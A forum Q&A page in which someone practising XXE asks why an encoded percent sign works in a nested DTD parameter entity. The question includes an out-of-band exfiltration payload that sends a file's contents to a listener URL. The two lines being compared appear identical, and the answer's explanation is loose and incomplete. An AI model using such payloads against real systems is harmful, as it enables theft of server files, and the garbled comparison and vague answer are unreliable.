Reputation: 63
What is the meaning of '%' in this XML DTD?
When I was practice XXE, I found it worked when I use DTD ENTITY below to send my request.
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
But it didn't work when I send this.
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
The difference between them is "%" and "%",I wonder why it didn't work when I use "%" directly here. Thank you.
Upvotes: 0
Views: 343
Answers (1)
Reputation: 76859
This is an HTML encoded percent % sign (an escape sequence) within the PARAMETER ENTITY declaration of an XML file - and XML uses HTML encoding, in order not to break the syntax.
Quite the same in Android XML, which it also knows %% ...
there the raw % is commonly being used for substitutions.
The canonical version would be:
Because XML syntax uses some characters for tags and attributes it is not possible to directly use those characters inside XML tags or attribute values.
And that's why some special characters in XML behave alike a "reserved keyword".
Also see 15.3. Understanding XML DTDs.
Upvotes: 2
Related Questions
- What do '|', '?', '+', '*', and ',' mean in a DTD file?
- What does <?..?> mean in XML?
- What is the use of DTD in XML?
- What is DTD exactly?
- What does % mean in DTD?
- What kind of XML document describes this DTD?
- xml dtd - what does + quantifier applies towards in this element?
- Explanation of MathML DTD Syntax
- Explain this XML entity notation and reference
- XML DTD - What does the asterisk mean when it's outside the bracket